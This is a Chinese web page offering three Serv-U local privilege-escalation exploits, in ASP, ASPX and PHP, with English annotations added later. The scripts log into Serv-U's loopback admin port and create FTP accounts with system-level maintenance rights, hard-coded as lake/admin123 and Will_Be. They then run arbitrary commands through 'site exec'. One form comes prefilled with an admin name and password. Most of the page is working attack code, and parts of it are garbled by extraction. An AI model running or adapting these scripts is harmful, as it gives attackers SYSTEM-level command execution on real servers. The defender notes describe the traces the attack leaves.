aspx转发php_serv-u利用脚本(asp/aspx/php)

下面代码保存为servu.asp即可,利用了xml组件,建立一个用户名为lake、密码为admin123的可执行ftp帐号

Serv-U 2 admin by lake2

body,td,th {color: #0000FF;font-family: Verdana, Arial, Helvetica, sans-serif;}

body {background-color: #ffffff;font-size:14px; }

a:link {color: #0000FF;text-decoration: none;}

a:visited {text-decoration: none;color: #0000FF;}

a:hover {text-decoration: none;color: #FF0000;}

a:active {text-decoration: none;color: #FF0000;}

.buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}

.TextBox {border: 1px solid #084B8E}

Serv-U Local Get SYSTEM Shell with ASP

Author: lake2, http://lake2.0x54.org

user:

pwd :

port:

Add User

Del User

' Form handler for the page above (classic ASP / VBScript).
' Usr, pwd and port are taken from the posted form as-is; nothing is validated.
Usr = request.Form("duser")

pwd = request.Form("dpwd")

port = request.Form("dport")

'Command = request.Form("dcmd")

' "add" builds a Serv-U maintenance session that creates an FTP account;
' every other value of the radio button takes the delete branch.
if request.Form("radiobutton") = "add" Then

' FTP login lines, then SITE MAINTENANCE to switch into admin mode.
lake2 = "User " & Usr & vbcrlf

lake2 = lake2 & "Pass " & pwd & vbcrlf

lake2 = lake2 & "SITE MAINTENANCE" & vbcrlf

'lake2 = lake2 & "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf

' -SETUSERSETUP block: hard-coded account lake/admin123 on port 21, HomeDir c:\,
' -Maintenance=System and RWAMELCDP access on c:\. Each parameter line is
' "-Name=Value"; the last line starts with a space instead of "-" (the same
' convention is used by every block on this page; its meaning is not shown here).
' The continuation lines below are separated by blank lines, which is most likely
' extraction damage: VBScript expects the continued line directly after "_".
' DEFENDER NOTE: an unexpected account carrying -Maintenance=System in Serv-U's
' user settings is the artifact this branch leaves behind.
lake2 = lake2 & "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=21" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _

"-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _

"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _

"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _

"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _

"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _

"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf

'lake2 = lake2 & "quit" & vbcrlf

'--------

'On Error Resume Next

' The assembled text is posted to the admin port on the loopback address as the
' body of an HTTP request (presumably the server skips the HTTP request line and
' headers and reads the body as FTP commands — not verifiable from this page).
' The third Open argument (True) makes the call asynchronous, so the script
' neither waits for nor inspects any reply.
' The "[url]...[/url]" around the URL looks like forum markup left in by the
' page rather than part of the original script — TODO confirm.
Set xPost = CreateObject("MSXML2.XMLHTTP")

xPost.Open "POST", "[url]http://127.0.0.1:[/url]"& port &"/lake2", True

xPost.Send(lake2)

Set xPOST=nothing

' Success is reported unconditionally. The string literal spans two lines here
' (a line break inside the string, presumably where a tag was stripped).
response.write "FTP user lake pass admin123 :)
"

else

' Delete branch: same login and SITE MAINTENANCE prologue ...
lake2 = "User " & Usr & vbcrlf

lake2 = lake2 & "Pass " & pwd & vbcrlf

lake2 = lake2 & "SITE MAINTENANCE" & vbcrlf

' ... followed by a -DELETEUSER block that removes the "lake" account on port 21.
lake2 = lake2 & "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=21" & vbcrlf & " User=lake" & vbcrlf

' Same fire-and-forget POST as in the add branch; again no reply is checked.
Set xPost3 = CreateObject("MSXML2.XMLHTTP")

xPost3.Open "POST", "[url]http://127.0.0.1:[/url]"& port &"/lake2", True

xPost3.Send(lake2)

Set xPOST3=nothing

response.write "Done!
"

end if

%>

Only for Enjoy&Challenge

!

下面保存为servu.aspx,利用servu的本地溢出执行命令

'

' Love, Where are you ?

' Click handler for the ASPX page: reads user, password, port and command from
' the page's text boxes and talks to the local Serv-U admin port over raw TCP.
' Port is assigned from Text_Port.Text by an implicit String->Int32 conversion
' (compiles only with Option Strict Off; presumably throws on non-numeric
' input). Nothing else is validated, and no Try/Finally protects the two
' sockets opened below, so any exception after Connect leaks them.
Sub BTN_Start_Click(sender As Object, e As EventArgs)

Dim Usr As String = Text_Name.Text

Dim pwd As String = Text_PWD.Text

Dim Port As Int32 = Text_Port.Text

Dim Command As String = Text_cmd.Text

' FTP login lines for the admin session.
Dim LoginUser As String = "User " & Usr & vbcrlf

Dim LoginPass As String = "Pass " & pwd & vbcrlf

' -SETDOMAIN block: a temporary domain "cctv" listening on 0.0.0.0:43859.
' In every block on this page the last line starts with a space rather than
' "-" (a page-wide convention; its meaning is not shown here).
Dim NewDomain As String = "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf

' -DELETEDOMAIN block for the domain on 43859; sent once before creating the
' domain and once again at the end.
Dim DelDomain As String = "-DELETEDOMAIN" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & " PortNo=43859" & vbcrlf

' -SETUSERSETUP block: hard-coded account lake/admin123 on port 43859,
' HomeDir c:\, -Maintenance=System and RWAMELCDP access on c:\.
' The continuation lines are separated by blank lines, which is most likely
' extraction damage: VB expects the continued line directly after "_".
Dim NewUser AS String = "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=43859" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _

"-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _

"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _

"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _

"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _

"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _

"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf

Dim Quit As String = "QUIT" & vbcrlf

Dim MAINTENANCE As String = "SITE MAINTENANCE" & vbcrlf

'Dim client As New TcpClient

' Admin session: connect to the loopback admin port. On failure the exception
' text is written to the page and the response ends here.
Dim tcpClient As New TcpClient()

Try

tcpClient.Connect("127.0.0.1", port)

Catch eee As Exception

response.write(eee.ToString())

response.end

End Try

tcpClient.ReceiveBufferSize = 1024

Dim networkStream As NetworkStream = tcpClient.GetStream()

' Strict send/receive lock-step (Rec and Send are the helpers defined below).
' Each Rec reads at most one 1024-byte chunk, so a reply split across reads or
' spanning several lines would leave the exchange out of step.
' Order: banner, USER, PASS, SITE MAINTENANCE, delete domain, create domain,
' create user.
Rec(networkStream)

Send(networkStream, LoginUser)

Rec(networkStream)

Send(networkStream, LoginPass)

Rec(networkStream)

Send(networkStream, MAINTENANCE)

Rec(networkStream)

Send(networkStream, DelDomain)

Rec(networkStream)

Send(networkStream, NewDomain)

Rec(networkStream)

Send(networkStream, NewUser)

Rec(networkStream)

' Second connection, to the domain just created on 43859. If this connect
' fails the response ends without closing tcpClient and without undoing the
' domain and user created above.
Dim tcpClient2 As New TcpClient()

Try

tcpClient2.Connect("127.0.0.1", 43859)

Catch eee As Exception

response.write(eee.ToString())

response.end

End Try

tcpClient2.ReceiveBufferSize = 1024

Dim networkStream2 As NetworkStream = tcpClient2.GetStream()

' Logs in as lake/admin123 and sends "site exec " with the text-box content
' appended verbatim; whatever the server answers is echoed by Rec.
' DEFENDER NOTE: a domain that appears and disappears on 43859 and a SITE EXEC
' arriving from 127.0.0.1 are the observable traces of this exchange, to the
' extent the server's own logging records them.
Rec(networkStream2)

Send(networkStream2, "User lake" & vbcrlf)

Rec(networkStream2)

Send(networkStream2, "pass admin123" & vbcrlf)

Rec(networkStream2)

Send(networkStream2, "site exec " & Command & vbcrlf)

Rec(networkStream2)

tcpClient2.Close()

' Clean-up on the admin session: delete the temporary domain, QUIT, close.
' No explicit delete-user step follows; whether removing the domain also
' removes the lake account is not shown on this page.
Send(networkStream, DelDomain)

Rec(networkStream)

Send(networkStream, Quit)

Rec(networkStream)

tcpClient.Close()

End Sub

' Reads one chunk from a stream and echoes it into the response.
' o is late-bound (Object), so CanRead/Read resolve at run time and need
' Option Strict Off. bytes(1024) declares indices 0..1024, i.e. 1025 elements;
' Read fills at most 1024 of them and its return value (the byte count) is
' discarded, so GetString decodes the whole array including any unfilled
' trailing NUL bytes. A single Read may also return less than one full reply.
Sub Rec(o As Object)

If o.CanRead Then

Dim bytes(1024) As Byte

o.Read(bytes, 0, 1024)

Dim returndata As String = Encoding.ASCII.GetString(bytes)

' The string literal spans two lines here (a line break inside the string,
' presumably where a tag was stripped from the page).
response.Write("out:" & returndata & "
")

Else

response.Write("What's wrong ?")

End If

End Sub

' ASCII-encodes data, writes it to the stream and echoes the same text into
' the response. o is late-bound (Object) like in Rec; the Write itself is
' unchecked, and a stream that cannot be written only produces the message
' below rather than an error.
Sub Send(o As Object,data As String)

If o.CanWrite Then

Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data)

o.Write(sendBytes, 0, sendBytes.Length)

' The string literal spans two lines here (a line break inside the string,
' presumably where a tag was stripped from the page).
response.write("in: " & data & "
")

Else

response.Write("What's wrong ?")

End If

End Sub

from Serv-U 2

admin by lake2

Name

LocalAdministrator

PWD

#l@$ak#.lk;0@P

Port

43958

cmd


下面保存为servu.php,是php版的servu本地溢出程序,可以执行命令。

// Form handler: runs only when Port, User and Pass were all posted.
// $_POST["Command"] is read further down but is not part of this guard, so a
// request without it raises an undefined-index notice at that point.
if(isset($_POST["Port"])&&isset($_POST["User"])&&isset($_POST["Pass"]))

{

// Scratch buffers for the last line sent / received; both are echoed back
// into the page unescaped after every exchange.
$sendbuf = "";

$recvbuf = "";

// -SETDOMAIN block: a temporary domain "haxorcitos" bound to 0.0.0.0:2121.
// Parameter lines are "-Name=Value"; the last line of each block starts with a
// space instead of "-" (the same convention as the ASP/ASPX variants above;
// its meaning is not shown on this page).
$domain = "-SETDOMAIN\r\n".

"-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n".

"-TZOEnable=0\r\n".

" TZOKey=\r\n";

// -SETUSERSETUP block: hard-coded account Will_Be/Will_Be on port 2121 with
// HomeDir c:\, -Maintenance=None and "RELP" access on c:\ (the ASP/ASPX
// variants above use -Maintenance=System and RWAMELCDP instead).
$adduser = "-SETUSERSETUP\r\n".

"-IP=0.0.0.0\r\n".

"-PortNo=2121\r\n".

"-User=Will_Be\r\n".

"-Password=Will_Be\r\n".

"-HomeDir=c:\\\r\n".

"-LoginMesFile=\r\n".

"-Disable=0\r\n".

"-RelPaths=1\r\n".

"-NeedSecure=0\r\n".

"-HideHidden=0\r\n".

"-AlwaysAllowLogin=0\r\n".

"-ChangePassword=0\r\n".

"-QuotaEnable=0\r\n".

"-MaxUsersLoginPerIP=-1\r\n".

"-SpeedLimitUp=0\r\n".

"-SpeedLimitDown=0\r\n".

"-MaxNrUsers=-1\r\n".

"-IdleTimeOut=600\r\n".

"-SessionTimeOut=-1\r\n".

"-Expire=0\r\n".

"-RatioUp=1\r\n".

"-RatioDown=1\r\n".

"-RatiosCredit=0\r\n".

"-QuotaCurrent=0\r\n".

"-QuotaMaximum=0\r\n".

"-Maintenance=None\r\n".

"-PasswordType=Regular\r\n".

"-Ratios=None\r\n".

" Access=c:\\|RELP\r\n";

// -DELETEDOMAIN block: tears the 2121 domain down again at the end.
$deldomain="-DELETEDOMAIN\r\n".

"-IP=0.0.0.0\r\n".

" PortNo=2121\r\n";

// Admin session on the loopback address, port taken straight from the form.
// Call-time pass-by-reference (&$errno, &$errstr) is a fatal error on PHP 5.4
// and later, and the return value is never checked: a failed connect leaves
// $sock === false and every fgets()/fputs() below then operates on a
// non-resource.
$sock = fsockopen("127.0.0.1", $_POST["Port"], &$errno, &$errstr, 10);

// Lock-step exchange. Each fgets() returns at most one line (up to 1023
// bytes), so a multi-line reply would leave the next read out of step.
// Every echo below contains a line break inside the string literal,
// presumably where a tag was stripped from the page.
$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

// USER / PASS with the posted credentials, then SITE MAINTENANCE.
$sendbuf = "USER ".$_POST["User"]."\r\n";

fputs($sock, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

$sendbuf = "PASS ".$_POST["Pass"]."\r\n";

fputs($sock, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

$sendbuf = "SITE MAINTENANCE\r\n";

fputs($sock, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

// Create the temporary domain, then the account inside it. Neither reply is
// inspected; the script proceeds regardless of what the server answered.
$sendbuf = $domain;

fputs($sock, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

$sendbuf = $adduser;

fputs($sock, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

echo "**********************************************************
";

echo "Starting Exploit ...
";

echo "**********************************************************
";

// Second connection, to the domain just created on the hard-coded port 2121;
// same unchecked fsockopen() and pass-by-reference syntax as above.
$exp = fsockopen("127.0.0.1", "2121", &$errno, &$errstr, 10);

$recvbuf = fgets($exp, 1024);

echo "Recv: $recvbuf
";

$sendbuf = "USER Will_Be\r\n";

fputs($exp, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($exp, 1024);

echo "Recv: $recvbuf
";

$sendbuf = "PASS Will_Be\r\n";

fputs($exp, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($exp, 1024);

echo "Recv: $recvbuf
";

// "site exec " with $_POST["Command"] appended verbatim, and then echoed back
// into the page without escaping (reflected straight into the HTML output,
// as is every $recvbuf above).
// DEFENDER NOTE: a domain that briefly appears on 2121 and a SITE EXEC issued
// from 127.0.0.1 are the traces this leaves in the server's own logs, where
// logging is enabled.
$sendbuf = "site exec ".$_POST["Command"]."\r\n";

fputs($exp, $sendbuf, strlen($sendbuf));

echo "Send: site exec ".$_POST["Command"]."
";

$recvbuf = fgets($exp, 1024);

echo "Recv: $recvbuf
";

echo "**********************************************************
";

echo "Starting Delete Domain ...
";

echo "**********************************************************
";

// Clean-up: delete the temporary domain on the admin session, then close both
// sockets. The Will_Be account is not deleted explicitly; whether removing the
// domain removes it too is not shown on this page.
$sendbuf = $deldomain;

fputs($sock, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

fclose($sock);

fclose($exp);

}

?>

Serv-U Local Exploit By Will_Be

LocalPort:

LocalUser:

LocalPass:

Command :
